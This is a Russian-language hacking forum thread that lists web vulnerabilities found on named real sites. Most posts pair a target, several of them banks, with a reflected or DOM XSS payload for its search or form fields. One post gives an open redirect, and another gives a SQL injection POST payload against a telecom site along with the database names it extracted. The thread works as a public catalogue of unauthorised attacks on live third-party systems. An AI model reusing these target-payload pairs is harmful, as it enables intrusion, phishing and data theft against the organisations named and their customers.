Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    последнее это что?
     
    _________________________
  2. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    151
    Likes Received:
    51
    Reputations:
    116
  3. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://www.kred-bank.ru
    type: XSS Reflected

    Строка поиска:
    Code:
    "><script>alert('Hello')</script>
     
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    target : http://6dosug777.com/en/spb/forum/o...u-po-karmanu-raznyie-tsenovyie-kategor.9.html
    Type:XSS-Reflected

    Code:
    '<script>alert('SIXSS')</script>

    Там в самом внизу комментарии можно оставлять без всяких заполнений .
    Сорри,я там нафлудил чуток) .


    Скрипт можете вставить свой,я чисто для примера другой написал .
     
  5. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ну может скопипастил,но не специально,т.к я просто рыскал по гуглу :) .

    А последнее это та же XSS,но на крайняк может понадобиться ;) .
     
  6. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://sobinbank.ru/
    type: Open Redirect

    Code:
    http://sobinbank.ru/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=http://ya.ru
    target: http://sinko-bank.ru
    type: XSS Reflected

    Строка поиска:
    Code:
    "><script>alert('Hello')</script>
     
    SaNDER and DDShadoww like this.
  7. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    target: http://halykbank.kz
    type: XSS-Reflected


    HTML:
    http://halykbank.kz/ru/search?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
     
    joelblack likes this.
  8. w0rm_

    w0rm_ Banned

    Joined:
    19 Aug 2015
    Messages:
    11
    Likes Received:
    24
    Reputations:
    8
    Target:home.singtel.com
    Type: SQL injection

    Code:
    http://home.singtel.com/include/tell_a_friend_process.asp 
    
    POST:
    segment_id_=awdpojawdpj&url_=awdz&page_title_=awd&email_sent_=xapt0x@xapk.ru' and 1=(select top 1 table_name from information_schema.tables)--&email_from_=aaw221&remark_=awdawd22&x=9&y=5 
    
    singtelsgp 
    singtelsgp-stag 
    miotv-stag 
    singtelmiotvstaffplan 
    miotv-prd 
    STSGP09-stag 
    STSGP09 
    ClickCounter 
    STMIO-STAG 
    STMIO 
    uefa-phase1 
    uefa-prod 
    uefa-stag 
    STSGP2011-stag-KIV 
    STSGP2011-KIV 
    race2011-stag 
    race2011-prod 
    singtelcorp2010new 
    yog 
    YOGWEBCAST 
    STCON 
    STBIZ 
    singtel_3 
    singtel_3_Monday1 
    eids_sso 
    accelerate 
    browdb 
    faceapp-stag 
    faceapp-prod 
    distis_agent 
    miotv400k_prd 
    
     
    Take_IT and YaBtr like this.
  9. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    target: 3dnews.ru
    type: DOM Based XSS


    В поля поиска
    Code:
    <script>alert(1)</script>
     
    #169 DDShadoww, 30 Aug 2015
    Last edited: 23 Sep 2015
  10. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    target:subscribe.ru
    type:XSS-Reflected
    Поиск :

    Code:
    <script>alert('XSS')</script>



    Кто-то уже до меня нашёл :Р .
     
  11. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    XSS на мобильной версии сайта KFC

    target: m.kfc.ru/career-vacancies/member
    type: XSS-Reflected


    В поля Фамилия, имя вводим
    Code:
    "><script>alert("XSS")</script>
    и так же в поле Мобильный телефон
     
    yarbabin likes this.
  12. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    BurgerKing

    target: burgerking.ru
    type: XSS-Reflected


    В поля поиска

    Code:
    "><script>alert(1)</script>
     
    YaBtr likes this.
  13. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Target: _ttp://www.edelws.ru
    Type : XSS-Reflected(вбивается под поисковик .)
    Code:
    "><script>alert("WH")</script> 
     
    #173 SaNDER, 2 Sep 2015
    Last edited: 9 Sep 2015
  14. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    это DOM based XSS
    работает даже в хроме
    Code:
    http://www.3dnews.ru/search/#query=<script>alert(1)</script>&sdate=&edate=&intitle=0
     
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    страннло что у меня не работает, может хром старый?
     
  16. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    151
    Likes Received:
    51
    Reputations:
    116
    Введи в поиск и нажми значок поиска <script>alert(1)</script>
    [​IMG]
     
  17. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    152
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    пассивно-активная XSS.
    Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.
     
  18. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: allbanks.ru
    Type: Reflected

    В поля поиска -
    Code:
    "><script>alert(1)</script>

    Target:
    capitalbank.kz/oldsite/
    Type: Reflected

    В поля поиска -
    Code:
    "><script>alert(1)</script>


    Target: asbank.ru/
    Type: Reflected

    В поля поиска -
    Code:
    "><script>alert(1)</script>
     
    #178 DDShadoww, 8 Sep 2015
    Last edited: 8 Sep 2015
  19. d3q

    d3q New Member

    Joined:
    6 Sep 2015
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    Видимо опечатка - второй и третий символ надо поменять местами
    Code:
    "><script>alert("WH")</script> 
    :)
     
    SaNDER likes this.
  20. DDShadoww

    DDShadoww New Member

    Joined:
    14 Jul 2015
    Messages:
    11
    Likes Received:
    4
    Reputations:
    2
    Target: foto7an.se
    Type: Reflected and Stored

    Весь в XSS. И еше бонус - foto7an.se/files/
     
Loading...